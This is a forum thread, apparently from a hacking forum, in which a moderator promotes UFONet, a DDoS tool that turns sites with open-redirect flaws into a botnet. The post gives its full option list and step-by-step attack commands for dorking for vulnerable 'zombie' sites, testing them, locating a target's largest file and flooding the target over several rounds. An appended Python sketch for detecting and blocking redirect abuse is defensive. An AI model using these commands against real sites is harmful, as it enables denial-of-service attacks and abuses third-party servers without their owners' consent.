
UFONet - DDoS Botnet via Web Abuse.


HATI (Moderator)
« on: April 14, 2016, 08:34:40 pm »
UFONet


You can read this post in Spanish: [link hidden]
Maybe a lot of people know about this tool, but I didn't find anything about it on the forum, and that is the reason for this post.

Briefly, UFONet is a DDoS tool that exploits the Open Redirect vulnerability in third-party web applications, using them like a botnet.
The Open Redirect vulnerability allows the attacker to perform a redirection to the target that he chooses, because that redirection is held in a variable that the user can control.

I think that this tool is curious and easy to use; it found a useful and creative way to exploit the Open Redirect vulnerability.


--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: '[link hidden]')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:

    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:

    -i INSPECT                                           Search for biggest file (ex: -i '[link hidden]')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s)://target.com')


Attack method:

#Searching for 'zombies':

To perform a DDoS attack using UFONet, first of all we must collect websites that are vulnerable to Open Redirect (zombies). For this, we must use specific dorks. The tool includes a wordlist called dorks.txt where we can find some useful parameters such as "proxy.php?url=" or "validator?uri=".

-Search by parameter:
Code:
./ufonet -s 'proxy.php?url='
-Search by dorks list:
Code:
./ufonet --sd 'dorks.txt'
-Select a search engine among google, duck, yahoo, yandex and bing:
Code:
./ufonet -s 'proxy.php?url=' --se 'bing'
-Select all search engines:
Code:
./ufonet -s 'proxy.php?url=' --sa
-To control how many 'zombies' are received from search engines, you can use:
Code:
./ufonet --sd 'dorks.txt' --sa --sn 20
-At the end of the process, you will be asked if you want to check the list retrieved to see if the URLs are vulnerable:
Code:
Wanna check if they are valid zombies? (Y/n)
-Also, you will be asked to update the list, automatically adding only 'vulnerable' web apps:
Code:
Wanna update your list (Y/n)

#Testing botnet:

-Launch test:
Code:
./ufonet -t zombies.txt
-Order 'zombies' to attack you:
Code:
./ufonet --attack-me

#Inspecting a target:

-This feature will provide you with the biggest file on the target:
Code:
./ufonet -i http://target.com
-You can use this when attacking to be more effective:
Code:
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

#Attacking a target:

-Enter a target to attack with a number of rounds (1 round by default):
Code:
./ufonet -a http://target.com -r 10


These are the basic options of UFONet; it has more advanced functions, like using a proxy. It is possible to use the tool with a GUI with the command:
Code:
./ufonet --gui

Spanish post: [link hidden]
Official site: [link hidden]

Regards, hati  ;D
« Last edit: May 11, 2016, 04:11:19 pm by hati »


Play or lose
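
Added example (not part of the original post and not UFONet code): a defender-side Python sketch for a site that exposes a redirect or proxy parameter such as the `url=` and `uri=` parameters mentioned in the post. `is_safe_target` rejects off-site targets before the application follows them, and `find_abuse` scans access-log lines for requests carrying such targets; the allowlisted hosts, the log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the only hosts this site may legitimately redirect or proxy to.
ALLOWED_HOSTS = {"www.example.org", "static.example.org"}

def is_safe_target(value, allowed=ALLOWED_HOSTS):
    """Return True if a user-supplied redirect/proxy target is acceptable."""
    value = value.strip()
    # Backslashes and control characters are parsed inconsistently; reject them.
    if "\\" in value or any(ord(c) < 0x20 for c in value):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        # Relative target: only a local path starting with a single slash.
        return value.startswith("/") and not value.startswith("//")
    return parts.scheme in ("http", "https") and parts.hostname in allowed

# Common/combined access-log format (assumed): client IP, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')
ABSOLUTE_RE = re.compile(r"^(?:https?:)?//([^/?#]*)", re.IGNORECASE)

def find_abuse(log_lines, allowed=ALLOWED_HOSTS):
    """Return (client_ip, path, param, authority) for off-site targets in query strings."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request_uri, _status = m.groups()
        path, _, query = request_uri.partition("?")
        for name, val in parse_qsl(query, keep_blank_values=True):
            target = ABSOLUTE_RE.match(val)  # parse_qsl already percent-decoded val
            if target and not is_safe_target(val, allowed):
                hits.append((ip, path, name, target.group(1)))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Apr/2016:20:34:40 +0000] "GET /proxy.php?url=http%3A%2F%2Ftarget.example%2Fbig.jpg HTTP/1.1" 302 0',
    '198.51.100.23 - - [14/Apr/2016:20:34:41 +0000] "GET /validator?uri=http://target.example/ HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/Apr/2016:20:34:42 +0000] "GET /proxy.php?url=https://static.example.org/logo.png HTTP/1.1" 302 0',
    '192.0.2.11 - - [14/Apr/2016:20:34:43 +0000] "GET /index.html HTTP/1.1" 200 1024',
]
```

Calling `find_abuse(SAMPLE_LOG)` returns the first two requests, whose parameters point at a host outside the allowlist; many different client IPs hitting the same parameter with the same third-party host is the pattern to alert on.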

unkdown
« Reply #1 on: May 03, 2016, 11:38:17 am »
Good job homie! :D
If someone doesn't understand that, I can leave a video here.




« Last edit: December 10, 2016, 02:13:04 pm by blackdrake »

AncientOne
« Reply #2 on: February 21, 2017, 10:24:59 pm »
It seems really interesting, buddy.  ;)
Push yourself as far as you can and when you can't keep going until the end...
